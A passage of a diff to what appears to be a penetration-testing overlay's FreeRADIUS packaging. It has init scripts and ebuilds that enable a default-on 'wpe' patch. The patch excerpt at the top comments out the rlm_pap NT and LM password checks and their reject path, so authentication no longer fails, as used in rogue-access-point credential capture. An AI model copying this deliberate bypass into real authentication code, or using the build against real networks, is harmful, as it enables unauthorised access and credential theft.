if ((fr_hex2bin(digest, digest, 16) != vp->length) ||
(rad_digest_cmp(digest, vp->vp_octets, vp->length) != 0)) {
snprintf(module_fmsg,sizeof(module_fmsg),"rlm_pap: NT password check failed");
goto make_msg;
}
+ */
goto done;
break;
@@ -770,16 +784,20 @@
snprintf(module_fmsg,sizeof(module_fmsg),"rlm_pap: mschap xlat failed");
goto make_msg;
}
+ /* WPE FTW
if ((fr_hex2bin(digest, digest, 16) != vp->length) ||
(rad_digest_cmp(digest, vp->vp_octets, vp->length) != 0)) {
snprintf(module_fmsg,sizeof(module_fmsg),"rlm_pap: LM password check failed");
+ */
make_msg:
+ /*
RDEBUG("Passwords don't match");
module_fmsg_vp = pairmake("Module-Failure-Message",
module_fmsg, T_OP_EQ);
pairadd(&request->packet->vps, module_fmsg_vp);
return RLM_MODULE_REJECT;
}
+ */
goto done;
break;

8
net-dialup/freeradius/files/radius.conf-r3
View file

@ -8,5 +8,9 @@
pidfile=/var/run/radiusd/radiusd.pid
# Change these values if you change them in /etc/raddb/radiusd.conf
# RADIUSD_USER=radius
# RADIUSD_GROUP=radius
#RADIUSD_USER=radius
#RADIUSD_GROUP=radius
# If you set up logging to syslog in /etc/raddb/radiusd.conf, you want
# to uncomment the following line.
#rc_use="logger"

29
net-dialup/freeradius/files/radius.init-r3
View file

@ -1,29 +1,32 @@
#!/sbin/runscript
# Copyright 1999-2012 Gentoo Foundation
# Copyright 1999-2014 Gentoo Foundation
# Distributed under the terms of the GNU General Public License v2
# $Header: /var/cvsroot/gentoo-x86/net-dialup/freeradius/files/radius.init-r3,v 1.2 2012/10/22 02:58:59 flameeyes Exp $
# $Header: /var/cvsroot/gentoo-x86/net-dialup/freeradius/files/radius.init-r3,v 1.4 2014/05/03 15:47:45 jer Exp $
command=/usr/sbin/radiusd
command_args="${RADIUSD_OPTS}"
pidfile="${pidfile:-/var/run/radiusd/radiusd.pid}"
pidfile="${pidfile:-/run/radiusd/radiusd.pid}"
extra_started_commands="reload"
depend() {
use dns
need localmount
use dns
}
start_pre() {
if [ ! -f /etc/raddb/radiusd.conf ] ; then
eerror "No /etc/raddb/radiusd.conf file exists!"
return 1
fi
if [ ! -f /etc/raddb/radiusd.conf ] ; then
eerror "No /etc/raddb/radiusd.conf file exists!"
return 1
fi
checkpath -m0750 -o "${RADIUSD_USER:-root}:${RADIUSD_GROUP:-root}" -d \
$(dirname ${pidfile}) /var/log/radius
checkpath -m0750 -o "${RADIUSD_USER:-root}:${RADIUSD_GROUP:-root}" -d \
$(dirname ${pidfile}) /var/log/radius
checkpath -m0750 -o "${RADIUSD_USER:-root}:${RADIUSD_GROUP:-root}" -d \
$(dirname ${pidfile}) /run/radius
}
reload() {
ebegin "Reloading radiusd"
kill -HUP $(cat /var/run/radiusd/radiusd.pid)
eend $?
ebegin "Reloading radiusd"
kill -HUP $(cat ${pidfile})
eend $?
}

168
net-dialup/freeradius/freeradius-2.1.12-r1.ebuild
View file

@ -1,168 +0,0 @@
# Copyright 1999-2011 Gentoo Foundation
# Distributed under the terms of the GNU General Public License v2
# $Header: /var/cvsroot/gentoo-x86/net-dialup/freeradius/freeradius-2.1.12.ebuild,v 1.1 2011/11/20 18:54:06 mrness Exp $
EAPI="4"
inherit eutils multilib pam autotools libtool
DESCRIPTION="Highly configurable free RADIUS server"
SRC_URI="ftp://ftp.freeradius.org/pub/radius/${PN}-server-${PV}.tar.gz"
HOMEPAGE="http://www.freeradius.org/"
KEYWORDS="~amd64 ~ppc ~ppc64 ~sparc ~x86"
LICENSE="GPL-2"
SLOT="0"
IUSE="bindist debug edirectory firebird frascend frxp kerberos ldap mysql pam postgres snmp ssl threads +udpfromto +wpe"
RDEPEND="!net-dialup/cistronradius
!net-dialup/gnuradius
>=sys-libs/db-3.2
sys-libs/gdbm
sys-libs/readline
net-libs/libpcap
dev-lang/perl
snmp? ( net-analyzer/net-snmp )
mysql? ( virtual/mysql )
postgres? ( dev-db/postgresql-server )
!bindist? ( firebird? ( dev-db/firebird ) )
pam? ( sys-libs/pam )
ssl? ( dev-libs/openssl )
ldap? ( net-nds/openldap )
kerberos? ( virtual/krb5 )
frxp? ( dev-lang/python )"
DEPEND="${RDEPEND}"
REQUIRED_USE="frxp? ( threads )"
S="${WORKDIR}/${PN}-server-${PV}"
pkg_setup() {
if use edirectory && ! use ldap ; then
eerror "Cannot add integration with Novell's eDirectory without having LDAP support!"
eerror "Either you select ldap USE flag or remove edirectory"
die "edirectory needs ldap"
fi
if has_version '<net-dialup/freeradius-2.1.12'; then
elog "Please remove radiusd group/user"
elog "New user/group is radius"
elog "please update /etc/raddb/radius.conf accordingly!"
fi
enewgroup radius
enewuser radius -1 -1 /var/log/radius radius
}
src_prepare() {
epatch "${FILESDIR}/${P}-versionless-la-files.patch"
epatch "${FILESDIR}/${P}-ssl.patch"
epatch "${FILESDIR}/${P}-qafixes.patch"
epatch "${FILESDIR}/${P}-pkglibdir.patch"
epatch "${FILESDIR}/${PN}-CVE-2012-3547.patch"
use wpe && epatch "${FILESDIR}/${PN}-2.1.11-wpe.patch"
append-flags -lpthread
# kill modules we don't use
if ! use ssl; then
einfo "removing rlm_eap_{tls,ttls,ikev2,peap} modules (no use ssl)"
rm -rf src/modules/rlm_eap/types/rlm_eap_{tls,ttls,ikev2,peap}
fi
if ! use ldap; then
einfo "removing rlm_ldap (no use ldap)"
rm -rf src/modules/rlm_ldap
fi
if ! use kerberos; then
einfo "removing rlm_krb5 (no use kerberos)"
rm -rf src/modules/rlm_krb5
fi
if ! use pam; then
einfo "removing rlm_pam (no use pam)"
rm -rf src/modules/rlm_pam
fi
if ! use mysql; then
einfo "removing rlm_sql_mysql (no use mysql)"
rm -rf src/modules/rlm_sql/drivers/rlm_sql_mysql
sed -i -e '/rlm_sql_mysql/d' src/modules/rlm_sql/stable
fi
if ! use postgres; then
einfo "removing rlm_sql_postgresql (no use postgres)"
rm -rf src/modules/rlm_sql/drivers/rlm_sql_postgresql
sed -i -e '/rlm_sql_postgresql/d' src/modules/rlm_sql/stable
fi
if use bindist || ! use firebird; then
einfo "removing rlm_sql_firebird (use bindist or no use firebird)"
rm -rf src/modules/rlm_sql/drivers/rlm_sql_firebird
sed -i -e '/rlm_sql_firebird/d' src/modules/rlm_sql/stable
fi
if use wpe; then
# einfo "fixing wpe settings for windows"
# sed -i 's/^# with_ntdomain_hack = no/ with_ntdomain_hack = yes/g' raddb/modules/mschap
# sed -i 's/with_ntdomain_hack = no/with_ntdomain_hack = yes/g' raddb/modules/preprocess
cp "${FILESDIR}"/clients_wpe.conf raddb/clients.conf || die "failed to copy config files"
cp "${FILESDIR}"/eap_wpe.conf raddb/eap.conf || die "failed to copy config files"
cp "${FILESDIR}"/users_wpe raddb/users || die "failed to copy config files"
fi
# These are needed for fixing libtool-2 related issues (#261189)
# Keep these lines even if you don't patch *.{in,am} files!
eautoreconf
elibtoolize
}
src_configure() {
local myconf="\
$(use_enable debug developer) \
$(use_with snmp) \
$(use_with frascend ascend-binary) \
$(use_with frxp experimental-modules) \
$(use_with udpfromto) \
$(use_with edirectory edir) \
$(use_with threads)"
# fix bug #77613
if has_version app-crypt/heimdal; then
myconf="${myconf} --enable-heimdal-krb5"
fi
econf --disable-static --disable-ltdl-install --with-system-libtool \
--localstatedir=/var ${myconf}
}
src_compile() {
emake -j1
#cd raddb
#emake
}
src_install() {
dodir /etc
dodir /var/log
dodir /var/run
diropts -m0750 -o root -g radius
dodir /etc/raddb
diropts -m0750 -o radius -g radius
dodir /var/log/radius
keepdir /var/log/radius/radacct
dodir /var/run/radiusd
diropts
emake R="${ED}" install
sed -i -e 's:^#user *= *nobody:user = radius:;s:^#group *= *nobody:group = radius:' \
"${ED}"/etc/raddb/radiusd.conf
chown -R root:radius "${ED}"/etc/raddb/*
pamd_mimic_system radius auth account password session
mv "${ED}/usr/share/doc/${PN}" "${ED}/usr/share/doc/${PF}"
dodoc CREDITS
rm "${ED}/usr/sbin/rc.radiusd"
newinitd "${FILESDIR}/radius.init-r2" radiusd
newconfd "${FILESDIR}/radius.conf" radiusd
cd "${ED}"/etc/raddb/certs
emake -j1 all
#cd raddb
#emake R=${ED} install
}

2
net-dialup/freeradius/freeradius-2.2.0-r1.ebuild
View file

@ -58,7 +58,7 @@ pkg_setup() {
src_prepare() {
epatch "${WORKDIR}"/patches/*.patch
if use wpe; then
epatch "${FILESDIR}/${PN}-2.1.12-wpe.patch"
epatch "${FILESDIR}/${P}-wpe.patch"
# einfo "fixing wpe settings for windows"
# sed -i 's/^# with_ntdomain_hack = no/ with_ntdomain_hack = yes/g' raddb/modules/mschap

167
net-dialup/freeradius/freeradius-2.2.0.ebuild
View file

@ -1,167 +0,0 @@
# Copyright 1999-2011 Gentoo Foundation
# Distributed under the terms of the GNU General Public License v2
# $Header: /var/cvsroot/gentoo-x86/net-dialup/freeradius/freeradius-2.1.12.ebuild,v 1.1 2011/11/20 18:54:06 mrness Exp $
EAPI="4"
inherit eutils multilib pam autotools libtool
DESCRIPTION="Highly configurable free RADIUS server"
SRC_URI="ftp://ftp.freeradius.org/pub/radius/${PN}-server-${PV}.tar.gz"
HOMEPAGE="http://www.freeradius.org/"
KEYWORDS="~amd64 ~ppc ~ppc64 ~sparc ~x86"
LICENSE="GPL-2"
SLOT="0"
IUSE="bindist debug edirectory firebird frascend frxp kerberos ldap mysql pam postgres snmp ssl threads +udpfromto +wpe"
RDEPEND="!net-dialup/cistronradius
!net-dialup/gnuradius
>=sys-libs/db-3.2
sys-libs/gdbm
sys-libs/readline
net-libs/libpcap
dev-lang/perl
snmp? ( net-analyzer/net-snmp )
mysql? ( virtual/mysql )
postgres? ( dev-db/postgresql-server )
!bindist? ( firebird? ( dev-db/firebird ) )
pam? ( sys-libs/pam )
ssl? ( dev-libs/openssl )
ldap? ( net-nds/openldap )
kerberos? ( virtual/krb5 )
frxp? ( dev-lang/python )"
DEPEND="${RDEPEND}"
REQUIRED_USE="frxp? ( threads )"
S="${WORKDIR}/${PN}-server-${PV}"
pkg_setup() {
if use edirectory && ! use ldap ; then
eerror "Cannot add integration with Novell's eDirectory without having LDAP support!"
eerror "Either you select ldap USE flag or remove edirectory"
die "edirectory needs ldap"
fi
if has_version '<net-dialup/freeradius-2.1.12'; then
elog "Please remove radiusd group/user"
elog "New user/group is radius"
elog "please update /etc/raddb/radius.conf accordingly!"
fi
enewgroup radius
enewuser radius -1 -1 /var/log/radius radius
}
src_prepare() {
epatch "${FILESDIR}/${PN}-2.1.12-versionless-la-files.patch"
epatch "${FILESDIR}/${PN}-2.1.12-ssl.patch"
epatch "${FILESDIR}/${PN}-2.1.12-qafixes.patch"
epatch "${FILESDIR}/${PN}-2.1.12-pkglibdir.patch"
use wpe && epatch "${FILESDIR}/${PN}-2.1.11-wpe.patch"
append-flags -lpthread
# kill modules we don't use
if ! use ssl; then
einfo "removing rlm_eap_{tls,ttls,ikev2,peap} modules (no use ssl)"
rm -rf src/modules/rlm_eap/types/rlm_eap_{tls,ttls,ikev2,peap}
fi
if ! use ldap; then
einfo "removing rlm_ldap (no use ldap)"
rm -rf src/modules/rlm_ldap
fi
if ! use kerberos; then
einfo "removing rlm_krb5 (no use kerberos)"
rm -rf src/modules/rlm_krb5
fi
if ! use pam; then
einfo "removing rlm_pam (no use pam)"
rm -rf src/modules/rlm_pam
fi
if ! use mysql; then
einfo "removing rlm_sql_mysql (no use mysql)"
rm -rf src/modules/rlm_sql/drivers/rlm_sql_mysql
sed -i -e '/rlm_sql_mysql/d' src/modules/rlm_sql/stable
fi
if ! use postgres; then
einfo "removing rlm_sql_postgresql (no use postgres)"
rm -rf src/modules/rlm_sql/drivers/rlm_sql_postgresql
sed -i -e '/rlm_sql_postgresql/d' src/modules/rlm_sql/stable
fi
if use bindist || ! use firebird; then
einfo "removing rlm_sql_firebird (use bindist or no use firebird)"
rm -rf src/modules/rlm_sql/drivers/rlm_sql_firebird
sed -i -e '/rlm_sql_firebird/d' src/modules/rlm_sql/stable
fi
if use wpe; then
# einfo "fixing wpe settings for windows"
# sed -i 's/^# with_ntdomain_hack = no/ with_ntdomain_hack = yes/g' raddb/modules/mschap
# sed -i 's/with_ntdomain_hack = no/with_ntdomain_hack = yes/g' raddb/modules/preprocess
cp "${FILESDIR}"/clients_wpe.conf raddb/clients.conf || die "failed to copy config files"
cp "${FILESDIR}"/eap_wpe.conf raddb/eap.conf || die "failed to copy config files"
cp "${FILESDIR}"/users_wpe raddb/users || die "failed to copy config files"
fi
# These are needed for fixing libtool-2 related issues (#261189)
# Keep these lines even if you don't patch *.{in,am} files!
eautoreconf
elibtoolize
}
src_configure() {
local myconf="\
$(use_enable debug developer) \
$(use_with snmp) \
$(use_with frascend ascend-binary) \
$(use_with frxp experimental-modules) \
$(use_with udpfromto) \
$(use_with edirectory edir) \
$(use_with threads)"
# fix bug #77613
if has_version app-crypt/heimdal; then
myconf="${myconf} --enable-heimdal-krb5"
fi
econf --disable-static --disable-ltdl-install --with-system-libtool --with-system-libltdl \
--localstatedir=/var ${myconf}
}
src_compile() {
emake -j1
#cd raddb
#emake
}
src_install() {
dodir /etc
dodir /var/log
dodir /var/run
diropts -m0750 -o root -g radius
dodir /etc/raddb
diropts -m0750 -o radius -g radius
dodir /var/log/radius
keepdir /var/log/radius/radacct
dodir /var/run/radiusd
diropts
emake R="${ED}" install
sed -i -e 's:^#user *= *nobody:user = radius:;s:^#group *= *nobody:group = radius:' \
"${ED}"/etc/raddb/radiusd.conf
chown -R root:radius "${ED}"/etc/raddb/*
pamd_mimic_system radius auth account password session
mv "${ED}/usr/share/doc/${PN}" "${ED}/usr/share/doc/${PF}"
dodoc CREDITS
rm "${ED}/usr/sbin/rc.radiusd"
newinitd "${FILESDIR}/radius.init-r2" radiusd
newconfd "${FILESDIR}/radius.conf" radiusd
cd "${ED}"/etc/raddb/certs
emake -j1 all
#cd raddb
#emake R=${ED} install
}

203
net-dialup/freeradius/freeradius-2.2.5.ebuild Normal file
View file

@ -0,0 +1,203 @@
# Copyright 1999-2014 Gentoo Foundation
# Distributed under the terms of the GNU General Public License v2
# $Header: /var/cvsroot/gentoo-x86/net-dialup/freeradius/freeradius-2.2.5.ebuild,v 1.4 2014/05/06 04:12:34 jer Exp $
EAPI=5
PYTHON_COMPAT=( python2_7 )
inherit autotools eutils pam python-any-r1 user
PATCHSET=4
MY_P="${PN}-server-${PV}"
DESCRIPTION="Highly configurable free RADIUS server"
SRC_URI="
ftp://ftp.freeradius.org/pub/radius/${MY_P}.tar.gz
ftp://ftp.freeradius.org/pub/radius/old/${MY_P}.tar.gz
http://dev.gentoo.org/~flameeyes/${PN}/${PN}-2.2.0-patches-${PATCHSET}.tar.xz
"
HOMEPAGE="http://www.freeradius.org/"
KEYWORDS="amd64 ~ppc ~ppc64 ~sparc ~x86 ~x86-fbsd"
LICENSE="GPL-2"
SLOT="0"
IUSE="
bindist debug firebird iodbc kerberos ldap mysql odbc oracle pam pcap
postgres python readline sqlite ssl +wpe
"
RDEPEND="!net-dialup/cistronradius
!net-dialup/gnuradius
sys-devel/libtool
dev-lang/perl
sys-libs/gdbm
python? ( ${PYTHON_DEPS} )
readline? ( sys-libs/readline )
pcap? ( net-libs/libpcap )
mysql? ( virtual/mysql )
postgres? ( dev-db/postgresql-base )
firebird? ( dev-db/firebird )
pam? ( virtual/pam )
ssl? ( dev-libs/openssl )
ldap? ( net-nds/openldap )
kerberos? ( virtual/krb5 )
sqlite? ( dev-db/sqlite:3 )
odbc? ( dev-db/unixODBC )
iodbc? ( dev-db/libiodbc )
oracle? ( dev-db/oracle-instantclient-basic )"
DEPEND="${RDEPEND}"
REQUIRED_USE="bindist? ( !firebird )"
S="${WORKDIR}/${MY_P}"
pkg_setup() {
enewgroup radius
enewuser radius -1 -1 /var/log/radius radius
python-any-r1_pkg_setup
export PYTHONBIN="${EPYTHON}"
}
src_prepare() {
epatch \
"${WORKDIR}"/patches/0002*patch \
"${WORKDIR}"/patches/0004*patch \
"${FILESDIR}"/${P}-gentoo.patch
if use wpe; then
epatch "${FILESDIR}/${P}-wpe.patch"
cp "${FILESDIR}"/clients_wpe.conf raddb/clients.conf || die "failed to copy config files"
cp "${FILESDIR}"/eap_wpe.conf raddb/eap.conf || die "failed to copy config files"
cp "${FILESDIR}"/users_wpe raddb/users || die "failed to copy config files"
fi
# most of the configuration options do not appear as ./configure
# switches. Instead it identifies the directories that are available
# and run through them. These might check for the presence of
# various libraries, in which case they are not built. To avoid
# automagic dependencies, we just remove all the modules that we're
# not interested in using.
use ssl || rm -r src/modules/rlm_eap/types/rlm_eap_{tls,ttls,peap}
use ldap || rm -r src/modules/rlm_ldap
use kerberos || rm -r src/modules/rlm_krb5
use pam || rm -r src/modules/rlm_pam
use python || rm -r src/modules/rlm_python
# Do not install ruby rlm module, bug #483108
rm -r src/modules/rlm_ruby
# these are all things we don't have in portage/I don't want to deal
# with myself
rm -r src/modules/rlm_eap/types/rlm_eap_tnc # requires TNCS library
rm -r src/modules/rlm_eap/types/rlm_eap_ikev2 # requires libeap-ikev2
rm -r src/modules/rlm_opendirectory # requires some membership.h
rm -r src/modules/rlm_redis{,who} # requires redis
rm -r src/modules/rlm_sql/drivers/rlm_sql_{db2,freetds,sybase}
# sql drivers that are not part of experimental are loaded from a
# file, so we have to remove them from the file itself when we
# remove them.
usesqldriver() {
local flag=$1
local driver=rlm_sql_${2:-${flag}}
if ! use ${flag}; then
rm -r src/modules/rlm_sql/drivers/${driver} || die
sed -i -e /${driver}/d src/modules/rlm_sql/stable || die
fi
}
usesqldriver mysql
usesqldriver postgres postgresql
usesqldriver firebird
usesqldriver iodbc
usesqldriver odbc unixodbc
usesqldriver oracle
usesqldriver sqlite
# remove bundled ltdl to avoid conflicts
rm -r libltdl
epatch_user
eautoreconf
}
src_configure() {
# fix bug #77613
if has_version app-crypt/heimdal; then
myconf="${myconf} --enable-heimdal-krb5"
fi
use readline || export ac_cv_lib_readline=no
use pcap || export ac_cv_lib_pcap_pcap_open_live=no
# do not try to enable static with static-libs; upstream is a
# massacre of libtool best practices so you also have to make sure
# to --enable-shared explicitly.
econf \
--enable-shared --disable-static \
--disable-ltdl-install \
--with-system-libtool \
--with-system-libltdl \
--with-ascend-binary \
--with-udpfromto \
--with-dhcp \
--with-iodbc-include-dir=/usr/include/iodbc \
--with-experimental-modules \
--with-docdir=/usr/share/doc/${PF} \
--with-logdir=/var/log/radius \
$(use_enable debug developer) \
$(use_with ldap edir) \
$(use_with ssl openssl) \
${myconf}
}
src_compile() {
emake LIBTOOL=libtool
}
src_install() {
dodir /etc
diropts -m0750 -o root -g radius
dodir /etc/raddb
diropts -m0750 -o radius -g radius
dodir /var/log/radius
keepdir /var/log/radius/radacct
diropts
emake LIBTOOL=libtool R="${D}" install
fowners -R root:radius /etc/raddb
sed -i \
-e 's:/var/run/radiusd:/run/radiusd:' \
"${D}"/etc/raddb/radiusd.conf || die
pamd_mimic_system radiusd auth account password session
dodoc CREDITS
rm "${D}/usr/sbin/rc.radiusd"
newinitd "${FILESDIR}/radius.init-r3" radiusd
newconfd "${FILESDIR}/radius.conf-r3" radiusd
}
pkg_config() {
if use ssl; then
cd "${ROOT}"/etc/raddb/certs
./bootstrap
fi
}
pkg_preinst() {
if ! has_version ${CATEGORY}/${PN} && use ssl; then
elog "You have to run \`emerge --config =${CATEGORY}/${PF}\` to be able"
elog "to start the radiusd service."
fi
}